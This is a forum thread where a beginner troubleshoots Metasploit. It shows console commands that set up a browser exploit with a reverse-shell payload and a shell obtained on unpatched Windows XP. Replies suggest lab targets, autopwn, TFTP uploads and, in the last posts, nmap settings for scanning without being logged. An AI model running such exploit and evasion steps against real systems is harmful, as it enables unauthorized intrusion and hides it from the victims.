- This topic has 21 replies, 7 voices, and was last updated 12 years, 4 months ago by
.
-
Posts
-
-
I have some problem with use metasploit
i’m test more exploit but not sucss I’don’t wht problem
look this example
use windows/browser/ani_loadimage_chunksize
set SRVHOST myip
set SRVPORT 8000
set URIPATH nono
set payload windows/shell_reverse_tcp
set LHOST ip victim
>exploit
[*] Started reverse handler[*] Using URL: http://ip:8000/nono%5B*%5D Server started.
after i’m test this on OS xp sp and IE 7 ,IE 6
after tell me [*] Sending HTML page to ip:6668…[*] Sending ANI file to ip:6668…
i’m wating but nothing happen
>> sessions -l
Active sessions===============No active sessions.
what problem >>>???
any idea?
and can any one give me some exploit working on xp sp2 and sp3
-
-
-
-
-
-
-
@BillV wrote:
@mr.Z wrote:
I’m using MSF under windows xp
There’s your first problem. Run it under Linux.
I can’t tell you what exploit to use, it depends on what your target is vulnerable to. As you’ve already figured out how to do, you can see which exploits will work against which targets.
thanx alot now i’m work in linux and update msf
—-
ChrisGthanx
I’m test this exploit but show me message problem
[*] Started bind handler
[-] Exploit failed: The connection timed out (ip-vicitm:4444).
[*] Exploit completed, but no session was created.why this not work what problem
but no session was created????
plz tell me
-
You probably aren’t vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there. That might get you further in the process. Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
-
@apollo wrote:
You probably aren’t vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there. That might get you further in the process. Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
You are correct but I want test on full patch windows xp
and I’m try much and i’m show if port 445 open then you can use ms08-067 expoit and if the windows xp full patchany more Idea?
-
@mr.Z wrote:
any more Idea?
Yes, I think you need to do more research and studying regarding exploits and how metasploit works.
I suggest you start here.
BillV
-
I’ll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus. There is another option for you to google which is db_autopwn. If you search for that, and you use backtrack3 things will get easier for you. If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate. If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.
-
@mr.Z wrote:
You are correct but I want test on full patch windows xp
and I’m try much and i’m show if port 445 open then you can use ms08-067 expoit and if the windows xp full patchany more Idea?
Your biggest problem is trying to exploit a fully patched windows xp box with metasploit. If you want to learn more about metasploit and practice pen testing techniques don’t attack a fully patched box in your lab.
Metasploit doesn’t have any zero day vulnerabilities included in it (currently) so you are never going to be able to successfully exploit a fully patched box with metasploit right now. Now if you really want to exploit a fully patched xp box you should take Billv’s suggestion to heart because that is going to involve getting into zero day vulnerability research. Which requires an in depth understanding of how exploits work. If you want to get into that I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition.
-
THANK YOU ALL
now i’m install windows xp witout servies pack
and exploit this windows
i’m use paylod
>”windows/shell_reverse_tcp”
>exploit
>Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:WINDOWSsystem32>
but I cant upload some file i’m using this msf under linux
test some command like this
>copy /root/xx.txt c:but not succss the error msg
>copy /root/xx.txt c:
The syntax of the command is incorrect -
If your getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP Server on your Linux box, when requesting the files using tftp they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp Payload and use the upload from there, it’s quicker. The meterpreter also has alot of other useful options as well.
-
-
-
OK THANK YOU FOR MORE INFO
BUT I WANNA ASK YOU ABOUT TOOL NMAP IF I USING SCAN? IS SAFE I MEAN IF I SCAN SOME IP REG THIS ON SERVER REGISTER MY IP ON LOG SERVER OR WHAT ?
IF YOU HAVE PAR MITER COMMAND FOR NMAP DON’T REGISTER ON LOG GIVE ME PLZ
like this
nmap -sS hostname
if i scan this SAFE or what?
-
-
-
@mr.Z wrote:
but somebody say if using this command is safe?
nmap -sS -O -v hostname
ok can tell me what solution
I’m a bit confused, what do you mean by ‘safe’?
- liable to crash the target?
- liable to get you arrested?
- liable to start world war 3?
- …
All (well ok most) depend on your hardware, target and situation.
-
I think he’s trying to figure out what scan would be the noisiest and what scan would be safer to run without being logged. You should look into:
http://www.nmap-tutorial.com/
And download the Nmap Tutorial, PDF, I just gave it a quick read through it tells what parameters you could set in nmap to make it less detectable on hosts.
-
- You must be logged in to reply to this topic.
